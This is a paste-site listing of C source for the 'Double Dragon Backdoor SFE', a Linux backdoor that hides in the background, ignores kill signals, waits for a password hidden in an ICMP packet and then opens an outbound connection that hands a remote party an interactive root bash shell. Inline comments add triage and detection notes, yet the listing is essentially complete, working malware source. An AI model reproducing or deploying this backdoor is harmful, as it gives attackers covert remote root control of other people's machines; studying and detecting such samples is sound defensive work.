FlyFar

ranzou-sfe.c

Jun 6th, 2023
C 3.23 KB | Cybersecurity | 0 0
  1. /*
  2.          Double Dragon Backdoor SFE (Special Firewall Edition)
  3.                 by tHE rECIdjVO <recidjvo@pkcrew.org>
  4.  
  5.                    Member of the Packet Knights Crew
  6.                         http://www.pkcrew.org/
  7.  
  8.                         ---> Player 1: Ranzou
  9.                                                                 */
  10.  
  11. #define PASSWD "passwd"
  12. #define USER "root"
  13.  
  14. #define PROGRAM "Double Dragon Backdoor SFE (Special Firewall Edition)"
  15. #define AUTHOR "tHE rECIdjVO <recidjvo@pkcrew.org>"
  16.  
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19. #include <string.h>
  20. #include <signal.h>
  21. #include <pwd.h>
  22. #include <unistd.h>
  23. #include <netdb.h>
  24. #include <sys/socket.h>
  25. #include <sys/types.h>
  26. #include <netinet/in.h>
  27. #include <netinet/ip.h>
  28. #include <netinet/ip_icmp.h>
  29. #include <grp.h>
  30.  
  31. // Trigger payload: wait_icmp() overlays this struct on the bytes that follow
      // the IP header and struct icmp in every packet it reads.
  32. struct cb_data{
  33.     char pass[30];          // compared against PASSWD in wait_icmp()
  34.     u_long jimmy_ip;        // handed to callback() as the address to connect to
  35.     u_short jimmy_port;     // handed to callback() as the TCP port (htons() is applied there)
  36. };
  37.  
  38. int main(int argc, char *argv[]);               // forks into the background, then wait_icmp()
  39. void wait_icmp(void);                           // raw-socket listener loop
  40. void callback(u_long jimmyip, int jimmyport);   // outbound TCP connection and shell
  41.  
  42. int main(int argc, char *argv[])
  43. {
          /*
           * Entry point. Sets SIGINT, SIGHUP and SIGTERM to SIG_IGN, forks, and
           * has the child start a new session and enter wait_icmp(). The parent
           * (and a failed fork) falls through to exit(0), so the launching shell
           * sees an immediate, successful return. argc and argv are not used.
           *
           * Triage notes: the surviving process has detached from its terminal
           * via setsid() and ignores SIGTERM, so a plain kill has no effect;
           * SIGKILL cannot be ignored. Ignored dispositions are inherited across
           * fork() and exec(), so they also apply to the shell started later by
           * callback().
           */
  44.     // Signal handling: the three common termination signals are ignored
  45.     signal(SIGINT, SIG_IGN);
  46.     signal(SIGHUP, SIG_IGN);
  47.     signal(SIGTERM, SIG_IGN);
  48.  
  49.     // Going in the background: only the child (fork() == 0) keeps running
  50.     if(fork() == 0) {
  51.         setsid();
  52.         wait_icmp();
  53.     }
  54.     exit(0);
  55. }
  56.  
  57. void callback(u_long jimmyip, int jimmyport)
  58. {
          /*
           * Connect-back routine. Opens a TCP connection to jimmyip:jimmyport,
           * points stdin/stdout/stderr at that socket, switches to the USER
           * account and replaces the process image with an interactive /bin/bash.
           * Never returns to the caller: every path ends in exit() or execl().
           *
           * Both arguments are taken, unvalidated, from the received packet by
           * wait_icmp().
           *
           * Detection notes:
           *  - the host opens an outbound TCP connection about two seconds
           *    (sleep(2)) after an inbound ICMP packet;
           *  - a bash process started with -noprofile -norc -i whose
           *    descriptors 0, 1 and 2 all refer to the same TCP socket;
           *  - system("whoami") runs just before the exec, so process auditing
           *    records a short-lived child for it;
           *  - the PROGRAM / AUTHOR banner is written to the connection in
           *    cleartext and is also present as a literal in the binary.
           */
  59.     int jsock, jconn;               // jconn is never used
  60.     struct sockaddr_in jaddr;
  61.     struct passwd *userent;
  62.     gid_t groups[1];                // never used
  63.  
  64.     setsid();
  65.     // Connect to the caller host (exit status 1: socket() failed)
  66.     if((jsock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  67.         exit(1);
  68.     }
  69.  
          // The address is round-tripped through its dotted-quad text form;
          // the port is converted to network byte order here.
  70.     jaddr.sin_family = AF_INET;
  71.     jaddr.sin_addr.s_addr = inet_addr(inet_ntoa(jimmyip));
  72.     jaddr.sin_port = htons(jimmyport);
  73.  
          // Fixed two-second delay before connecting (exit status 2: connect() failed)
  74.     sleep(2);
  75.     if(connect(jsock, &jaddr, sizeof(jaddr)) < 0) {
  76.         exit(2);
  77.     }
  78.  
  79.     // Dup socket onto stdin, stdout and stderr
  80.     dup2(jsock, 0);
  81.     dup2(jsock, 1);
  82.     dup2(jsock, 2);
  83.  
  84.     // Look up USER (falling back to "root") and adopt its groups, gid and uid.
          // userent is dereferenced without a NULL check after the fallback, and the
          // return values of initgroups()/setgid()/setuid() are not checked.
  85.     if((userent = getpwnam(USER)) == NULL) {
  86.         userent = getpwnam("root");
  87.     }
  88.     initgroups(userent->pw_name, userent->pw_gid);
  89.     setgid(userent->pw_gid);
  90.     setuid(userent->pw_uid);
  91.  
  92.     // Run the shell: banner and whoami output go to the socket (now stdout)
  93.     printf("\n\n\t" PROGRAM "\n\t\tby " AUTHOR "\n\nWelcome, you are now ");
  94.     fflush(stdout);
  95.     system("whoami");
  96.     execl("/bin/bash", "/bin/bash", "-noprofile", "-norc", "-i", 0);
          // Only reached if execl() failed
  97.     close(jsock);
  98.     exit(0);
  99. }
  100.  
  101. void wait_icmp(void)
  102. {
           /*
            * Listener loop. Opens a raw socket for protocol 1 (ICMP), reads each
            * packet into a heap buffer and compares the pass field of the
            * overlaid struct cb_data with PASSWD. On a match it forks and calls
            * callback() with the address and port carried in the same packet.
            * Loops forever; exits with status 1 only if the socket cannot be
            * created.
            *
            * Only pdata->pass is inspected. The ICMP type/code and the sender
            * address in `from` are never examined, so network signatures should
            * not assume a particular ICMP type.
            *
            * Detection notes:
            *  - on Linux a raw socket needs root or CAP_NET_RAW; a long-lived
            *    non-ping process holding a raw ICMP socket shows up in
            *    /proc/net/raw and in `ss -w`;
            *  - PASSWD travels in cleartext in the ICMP payload and is a plain
            *    string literal in the binary;
            *  - callback() runs in the branch where fork() != 0, i.e. in the
            *    process that was listening, so the shell keeps the old listener
            *    PID and the newly forked child carries on listening under a new
            *    PID after every trigger.
            */
  103.         char *packet;
  104.         struct ip *pip;             // assigned below, never read
  105.         struct icmp *picmp;         // assigned below, never read
  106.     struct cb_data *pdata;
  107.         int sock, strlen, hincl = 1;    // `strlen` is a local holding the address length; hincl is never used
  108.         struct sockaddr_in from;
  109.  
  110.     // Create socket to receive ICMP data (protocol number 1 is ICMP)
  111.         if((sock = socket(AF_INET, SOCK_RAW, 1)) < 0) {
  112.         exit(1);
  113.         }
           // One buffer sized for an IP header, a struct icmp and 64 further bytes;
           // pdata points at those trailing bytes. The buffer is zeroed once, here,
           // and not again between packets.
  114.         packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + 64);
  115.         pip = (struct ip *)packet;
  116.         picmp = (struct icmp *)(packet + sizeof(struct ip));
  117.         pdata = (struct cb_data *)(packet + sizeof(struct ip) + sizeof(struct icmp));
  118.         memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + 64);
  119.  
  120.     strlen = sizeof(from);
  121.     while(1) {
  122.         // Read each ICMP packet searching for a matching passwd.
               // The return value of recvfrom() is ignored; the comparison covers
               // sizeof(PASSWD) bytes, i.e. the literal plus its terminating NUL.
  123.             recvfrom(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + 64, 0, (struct sockaddr *)&from, &strlen);
  124.         if(strncmp(PASSWD, pdata->pass, sizeof(PASSWD)) == 0) {
  125.             if(fork() != 0) {
  126.                 // Start the callback (does not return; see callback())
  127.                 callback(pdata->jimmy_ip, pdata->jimmy_port);
  128.             }  
  129.         }
  130.     }
  131. }
Tags: Linux Backdoor